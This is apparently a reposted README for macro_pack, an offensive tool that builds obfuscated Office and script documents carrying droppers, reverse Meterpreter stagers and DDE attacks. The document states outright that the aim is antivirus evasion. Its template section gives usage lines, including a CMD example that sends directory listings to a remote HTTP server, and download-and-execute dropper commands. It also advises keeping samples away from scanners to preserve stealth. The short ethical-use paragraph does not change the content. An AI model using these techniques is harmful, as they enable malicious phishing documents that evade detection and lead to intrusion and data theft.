macro_pack – Tool Used To Automatize Obfuscation And Generation Of Ms Office Documents For Pentest, Demo, And Social Engineering Assessments. The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. This tool can be used for redteaming, pentests, demos, and social engineering assessments. macro_pack will simplify antimalware solutions bypass and automatize the process from vba generation to final Office document generation.

It is very simple to use:

  • No configuration
  • Everything can be done using a single line of code
  • Generation of majority of Office formats and VBS based formats
  • Advanced VBA macro attacks as well as DDE attacks

The tool is compatible with payloads generated by popular pentest tools (Metasploit, Empire, …). It is also easy to combine with other tools as it is possible to read input from stdin and have a quiet output to another tool.

This tool is written in Python3 and works on both Linux and Windows platform.

Note: Windows platform with the right MS Office applications installed is required for Office documents automatic generation or trojan features.

Obfuscation

The tool will use various obfuscation techniques, all automatic. Obfuscation feature is competible with all format that can be generated by macri_pack, VBA or VBS based.
Basic obfuscation (-o option) includes:

  • Renaming functions
  • Renaming variables
  • Removing spaces
  • Removing comments
  • Encoding Strings
  • Note that the main goal of macro_pack obfuscation is not to prevent reverse engineering, it is to prevent antivirus detection.

Generation

Macro Pack can generate several kinds of MS office documents and scripts formats. The format will be automatically guessed depending on the given file extension. File generation is done using the option –generate or -G.
Macro Pack pro version also allow to trojan existing files with option –trojan or -T

Ms Office Supported formats are:

  • MS Word 97 (.doc)
  • MS Word (.docm, .docx)
  • MS Excel 97 (.xls)
  • MS Excel (.xlsm)
  • MS PowerPoint (.pptm)
  • MS Visio 97 (.vsd)
  • MS Visio (.vsdm)
  • MS Project (.mpp)
  • Scripting (txt) supported formats are:
  • VBA text file (.vba)
  • VBS text file (.vbs)
  • Windows Script Host (.wsh)
  • Windows Script Components scriptlets (.wsc, .sct)
  • HTML Applications (.hta)

Note that all scripting formats can be generated on Linux version of macro_pack as well.

Ethical use

The macro_pack tool shall only be used by pentester, security researchers, or other people with learning purpose. I condamn all use of security tools for unethical actions (weather these ar legal or illegal). I know this will not prevent usage by malicious people and that is why all features are not publicly released.

About pro mode…

You may notice that not all part of macro_pack is available. Only the community version is available online. I fear the features in the pro version are really too much “weaponizing” the process and I do not want it available to all script kiddies out there. The pro mode includes features such as:

  • Advance antimalware bypass
  • VBOM security bypass
  • Self decoding VBA
  • MS Office persistance
  • Trojan existing MS Office documents
  • Lateral movement using DCOM objects
  • Anti-debug using http://seclists.org/fulldisclosure/2017/Mar/90
  • For now I do not plan to release or sell this pro version however if you are really interrested I can share pro binary in the next case:
  • You significally contribute to macro_pack on GitHub + I need to know your identity

Run/Install

Run Windows binary

  • Get the latest binary from https://github.com/sevagas/macro_pack/releases/
  • Download binary on PC with genuine Microsoft Office installed.
  • Open console, CD to binary dir and call the binary, simple as that!

Install from sources

Download and install dependencies:

Note: For windows, you also need to download manually pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/

The tool is in python 3 so just start with with your python3 install. ex:

If you want to produce a standalone exe using pyinstaller:

  • Install PyCrypto at http://www.voidspace.org.uk/python/pycrypto-2.6.1/
  • Double-click on the “build.bat” script on a Windows machine.
  • The resulted macro_pack.exe will be inside the bin directory.

Some examples

macro_pack community

Obfuscate the vba file generated by msfvenom and put result in a new vba file.

Obfuscate Empire stager vba file and generate a MS Word document:

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

Create a word 97 document containing an obfuscated VBA reverse meterpreter payload inside a share folder:

Download and execute Empire Launcher stager without powershell.exe by using DROPPER_PS template

Execute calc.exe via Dynamic Data Exchange (DDE) attack

Download and execute file via powershell using Dynamic Data Exchange (DDE) attack

Generate obfuscated Meterpreter reverse TCP VBS file and run it

Generated obfuscated HTA file which executes “systeminfo” and returns result to another macro_pack listening on 192.168.0.5

Generate obfuscated Meterpreter reverse https TCP SCT file and run it

macro_pack pro

  • Trojan the existing shared “report.xlsm” file with a dropper. Use anti-AV and anti-debug features.

  • Genenerate a Word file containing VBA self encoded x64 reverse meterpreter VBA payload (will bypass most AV). Keep-alive is needed because we need meterpreter to stay alive before we migrate.

  • Trojan a PowerPoint file with a reverse meterpreter. Macro is obfuscated and mangled to bypass most antiviruses.

  • Execute a macro on a remote PC using DCOM

All available options

General options:

macro_pack Pro only:

Template usage

Templates can be called using -t, –template=TEMPLATE_NAME combined with other options.
Here are all the available templates.

HELLO

Just print a hello message and awareness about macro
Give this template the name or email of the author
-> Example: echo “@Author” | macro_pack.exe -t HELLO -G hello.pptm

CMD

Execute a command line and send result to remote http server
Give this template the server url and the command to run
-> Example: echo “http://192.168.0.5:7777” “dir /Q C:” | macro_pack.exe -t CMD -o -G cmd.doc

DROPPER

Download and execute a file.
Give this template the file url and the target file path
-> Example: echo <file_to_drop_url> “<download_path>” | macro_pack.exe -t DROPPER -o -G dropper.xls

DROPPER2

Download and execute a file. File attributes are also set to system, read-only, and hidden.
Give this template the file url and the target file path.
-> Example: echo <file_to_drop_url> “<download_path>” | macro_pack.exe -t DROPPER2 -o -G dropper.xlsm

DROPPER_PS

Download and execute Powershell script using rundll32 (to bypass blocked powershell.exe).
Note: This payload will download PowerShdll from Github.
Give this template the url of the powershell script you want to run
-> Example: echo “<powershell_script_url>” | macro_pack.exe -t DROPPER_PS -o -G powpow.doc

DROPPER_DLL

Download a DLL with another extension and run it using Office VBA
-> Example, load meterpreter DLL using Office:

METERPRETER

Meterpreter reverse TCP template using MacroMeter by Cn33liz.
This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of listening mfsconsole
-> Example: echo <ip> <port> | macro_pack.exe -t METERPRETER -o -G meter.docm
Recommended msfconsole options (use exploit/multi/handler):

WEBMETER

Meterpreter reverse TCP template using VbsMeter by Cn33liz.
This template is CSharp Meterpreter Stager build by Cn33liz and embedded within VBA using DotNetToJScript from James Forshaw.
Give this template the IP and PORT of listening mfsconsole
-> Example: echo <ip> <port> | macro_pack.exe -t WEBMETER -o -G meter.vsd
Recommended msfconsole options (use exploit/multi/handler):

EMBED_EXE

Combine with –embed option, it will drop and execute (hidden) the embedded file.
Optionaly you can give to the template the path where file should be extracted
If extraction path is not given, file will be extracted with random name in current path.
-> Example1: macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.vbs
-> Example2: echo “path\\to\newcalc.exe” | macro_pack.exe -t EMBED_EXE –embed=%%windir%%\system32\calc.exe -o -G my_calc.doc

Efficiency

The various features were tested against localy installed Antimalware solutions as well as online service. I ran multiple tests with several kind of payloads and macro_pack features. A majority of antivirus will be evaded by the simple “obfuscate” option. Features available in pro mode generally ensure full AV bypass.

Example with Empire VBA stager:

Here are the results of NoDistribute scanner for the regular Empire VBA stager

Here are the results with the macro_pack -o (–obfuscate) option

Warning:

Do not submit your samples to online scanner (ex VirusTotal), Its the best way to break your stealth macro. I also suggest you do not submit to non reporting site such as NoDistribute. You cannot be sure what these sites will do with the data you submit. If you have an issue with macro_pack AV detection you can write to us for advice or submit an issue or pull request.

Relevant resources

Blog posts about MS Office security:

  • http://blog.sevagas.com/?My-VBA-Bot (write a full VBA RAT, includes how to bypass VBOM protection)
  • http://pwndizzle.blogspot.fr/2017/03/office-document-macros-ole-actions-dde.html
  • https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ (About Dynamic Data Exchange attacks)
  • https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/
  • https://labs.mwrinfosecurity.com/blog/dll-tricks-with-vba-to-improve-offensive-macro-capability/

Other useful links:

  • https://github.com/p3nt4/PowerShdll (Run PowerShell with dlls only)
  • https://gist.github.com/vivami/03780dd512fec22f3a2bae49f9023384 (Run powershel script with PowerShdll VBA implementation)
  • https://enigma0x3.net/2016/03/15/phishing-with-empire/ (Generate Empire VBA payload)
  • https://github.com/EmpireProject/Empire
  • https://medium.com/@vivami/phishing-between-the-app-whitelists-1b7dcdab4279
  • https://www.metasploit.com/
  • https://github.com/Cn33liz/MacroMeter
  • https://github.com/khr0x40sh/MacroShop

Download macro_pack